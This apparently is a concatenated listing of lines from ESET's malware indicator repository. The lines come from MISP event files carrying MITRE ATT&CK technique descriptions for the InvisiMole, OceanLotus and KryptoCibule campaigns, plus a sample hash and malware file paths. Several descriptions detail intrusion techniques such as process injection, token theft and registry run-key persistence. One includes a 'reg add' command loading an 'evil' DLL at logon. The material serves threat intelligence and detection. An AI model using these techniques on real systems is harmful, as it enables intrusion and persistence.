malware-ioc	evilnum	476BB78BCF194523C385E2CEE364D6D097464ECA – hi.txt (remote scriptlet)	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"remote-service-effects"	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1192). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193), [Spearphishing Link](https://attack.mitre.org/techniques/T1192), and [Spearphishing via Service](https://attack.mitre.org/techniques/T1194). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Utilities such as [at](https://attack.mitre.org/software/S0110) and [schtasks](https://attack.mitre.org/software/S0111), along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the remote system. (Citation: TechNet Task Scheduler Security)\n\nAn adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) with the icon and apparent extension of a document file. It also may lead to other execution techniques, such as when a user clicks on a link delivered via [Spearphishing Link](https://attack.mitre.org/techniques/T1192) that leads to exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. \n\nAs an example, an adversary may weaponize Windows Shortcut Files (.lnk) to bait a user into clicking to execute the malicious payload.(Citation: Proofpoint TA505 June 2018) A malicious .lnk file may contain [PowerShell](https://attack.mitre.org/techniques/T1086) commands. Payloads may be included into the .lnk file itself, or be downloaded from a remote server.(Citation: FireEye APT29 Nov 2018)(Citation: PWC Cloud Hopper Technical Annex April 2017) \n\nWhile User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n\nThe <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: <code>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n\nThe following Registry keys can control automatic startup of services during boot:\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit</code> and <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell</code> subkeys can automatically launch programs.\n\nPrograms listed in the load value of the registry key <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> run when any user logs on.\n\nBy default, the multistring BootExecute value of the registry key <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager</code> is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, [Scripting](https://attack.mitre.org/techniques/T1064), [PowerShell](https://attack.mitre.org/techniques/T1086), or by using utilities present on the system.\n\nOne such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia)\n\nAnother example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.\n\n### Windows\n\nThere are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Endgame Process Injection July 2017)\n\n* **Dynamic-link library (DLL) injection** involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.\n* **Portable executable injection** involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)\n* **Thread execution hijacking** involves injecting malicious code or the path to a DLL into a thread of a process. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), the thread must first be suspended.\n* **Asynchronous Procedure Call** (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. A variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)\n* **Thread Local Storage** (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)\n\n### Mac and Linux\n\nImplementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)\n\n* **LD_PRELOAD, LD_LIBRARY_PATH** (Linux), **DYLD_INSERT_LIBRARIES** (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)\n* **Ptrace system calls** can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)\n* **/proc/[pid]/mem** provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)\n* **VDSO hijacking** performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)\n\nMalware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Adversaries may use more than one remote access tool with varying command and control protocols or credentialed access to remote services so they can maintain access if an access mechanism is detected or mitigated. \n\nIf one type of tool is detected and blocked or removed as a response but the organization did not gain a full understanding of the adversary's tools and access, then the adversary will be able to retain access to the network. Adversaries may also attempt to gain access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use [External Remote Services](https://attack.mitre.org/techniques/T1133) such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.(Citation: Mandiant APT1) Adversaries may also retain access through cloud-based infrastructure and applications.\n\nUse of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain access to a network through an externally accessible Web server.",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts or cloud services enabled within the environment. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems.",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)\n\nAn adversary may gather the system time and/or time zone from a local or remote system. This information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing <code>net time \\\\hostname</code> to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>. (Citation: Technet Windows Time Service) The information could be useful for performing other techniques, such as executing a file with a [Scheduled Task](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting.",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"value": "Exploitation of Remote Services - T1210",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"tag_name": "misp-galaxy:mitre-attack-pattern=\"Exploitation of Remote Services - T1210\"",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1023) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1158). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"value": "Remote File Copy - T1105",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"tag_name": "misp-galaxy:mitre-attack-pattern=\"Remote File Copy - T1105\"",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as [FTP](https://attack.mitre.org/software/S0095). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.\n\nAdversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076).",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is [cmd](https://attack.mitre.org/software/S0106), which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. [Scheduled Task](https://attack.mitre.org/techniques/T1053)).\n\nAdversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command <code>runas</code>.(Citation: Microsoft runas)\n \nAdversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)\n\nAccess tokens can be leveraged by adversaries through three methods:(Citation: BlackHat Atkinson Winchester Token Manipulation)\n\n**Token Impersonation/Theft** - An adversary creates a new access token that duplicates an existing token using <code>DuplicateToken(Ex)</code>. The token can then be used with <code>ImpersonateLoggedOnUser</code> to allow the calling thread to impersonate a logged on user's security context, or with <code>SetThreadToken</code> to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system.\n\n**Create Process with a Token** - An adversary creates a new access token with <code>DuplicateToken(Ex)</code> and uses it with <code>CreateProcessWithTokenW</code> to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.\n\n**Make and Impersonate Token** - An adversary has a username and password but the user is not logged onto the system. The adversary can then create a logon session for the user using the <code>LogonUser</code> function. The function will return a copy of the new session's access token and the adversary can use <code>SetThreadToken</code> to assign the token to a thread.\n\nAny standard user can use the <code>runas</code> command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account.\n\nMetasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges.(Citation: Metasploit access token) The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. (Citation: Cobalt Strike Access Token)",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).\n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.\n\n### Mac\n\nOn OSX, the native command <code>screencapture</code> is used to capture screenshots.\n\n### Linux\n\nOn Linux, there is the native command <code>xwd</code>. (Citation: Antiquated Mac Malware)",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\n### Windows\n\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder)\n\n[Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the <code>net view \\\\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>.\n\nAdversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.\n\n### Mac\n\nOn Mac, locally mounted shares can be viewed with the <code>df -aH</code> command.\n\n### Cloud\n\nCloud virtual networks may contain remote network shares or file storage services accessible to an adversary after they have obtained access to a system. For example, AWS, GCP, and Azure support creation of Network File System (NFS) shares and Server Message Block (SMB) shares that may be mapped on endpoint or cloud-based systems.(Citation: Amazon Creating an NFS File Share)(Citation: Google File servers on Compute Engine)",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Adversaries can use methods of capturing user input for obtaining credentials for [Valid Accounts](https://attack.mitre.org/techniques/T1078) and information Collection that include keylogging and user input field interception.\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes, (Citation: Adventures of a Keystroke) but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider. (Citation: Wrightson 2012)\n\nKeylogging is likely to be used to acquire credentials for new access opportunities when [Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises.\n\nAdversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service. (Citation: Volexity Virtual Private Keylogging)",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"name": "misp-galaxy:mitre-attack-pattern=\"Exploitation of Remote Services - T1210\"",	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"name": "misp-galaxy:mitre-attack-pattern=\"Remote File Copy - T1105\"",	© ESET 2014-2018
malware-ioc	misp-kryptocibule.json	"value": "%LocalAppData%\\Java Runtime\\transmission-remote.exe",	© ESET 2014-2018
malware-ioc	kryptocibule	%LocalAppData%\Java Runtime\transmission-remote.exe	© ESET 2014-2018
malware-ioc	kryptocibule	Java Runtime Update, in, allow, %LocalAppData%\Java Runtime\transmission-remote.exe	© ESET 2014-2018
malware-ioc	kryptocibule	Java Runtime Update, out, allow, %LocalAppData%\Java Runtime\transmission-remote.exe	© ESET 2014-2018
malware-ioc	oceanlotus-macOS.misp.event.json	"remote-service-effects"],	© ESET 2014-2018
malware-ioc	oceanlotus-rtf_ocx_campaigns.misp.event.json	"description": "Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n===Browser-based Exploitation===\n\nWeb browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n===Office Applications===\n\nCommon office and productivity applications such as Microsoft Office are also targeted through Spearphishing Attachment, Spearphishing Link, and Spearphishing via Service. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n===Common Third-party Applications===\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.\n\nDetection: Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.\n\nPlatforms: Linux, Windows, macOS\n\nData Sources: Anti-virus, System calls, Process Monitoring\n\nSystem Requirements: Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise.\n\nRemote Support: Yes",	© ESET 2014-2018
malware-ioc	oceanlotus-rtf_ocx_campaigns.misp.event.json	"description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. \n\n===Windows===\n\nExample utilities used to obtain this information are <code>dir<\/code> and <code>tree<\/code>. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API.\n\n===Mac and Linux===\n\nIn Mac and Linux, this kind of discovery is accomplished with the <code>ls<\/code>, <code>find<\/code>, and <code>locate<\/code> commands.\n\nDetection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: File monitoring, Process command-line parameters, Process monitoring\n\nPermissions Required: User, Administrator, SYSTEM\n\nSystem Requirements: Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls",	© ESET 2014-2018
malware-ioc	oceanlotus-rtf_ocx_campaigns.misp.event.json	"description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).\n\nThe Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often Valid Accounts are required, along with access to the remote system's Windows Admin Shares for RPC communication.\n\nDetection: Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.\n\nMonitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell, which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nPlatforms: Windows\n\nData Sources: Windows Registry, File monitoring, Process monitoring, Process command-line parameters\n\nDefense Bypassed: Host forensic analysis\n\nPermissions Required: User, Administrator, SYSTEM\n\nContributors: Bartosz Jerzman, Travis Smith, Tripwire",	© ESET 2014-2018
malware-ioc	oceanlotus-rtf_ocx_campaigns.misp.event.json	"description": "When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry. \n\nAdversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with Masquerading. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through Service Execution.\n\nDetection: Monitor service creation through changes in the Registry and common utilities using command-line invocation. New, benign services may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence. (Citation: TechNet Autoruns) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could create services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.\n\nPlatforms: Windows\n\nData Sources: Windows Registry, Process monitoring, Process command-line parameters\n\nEffective 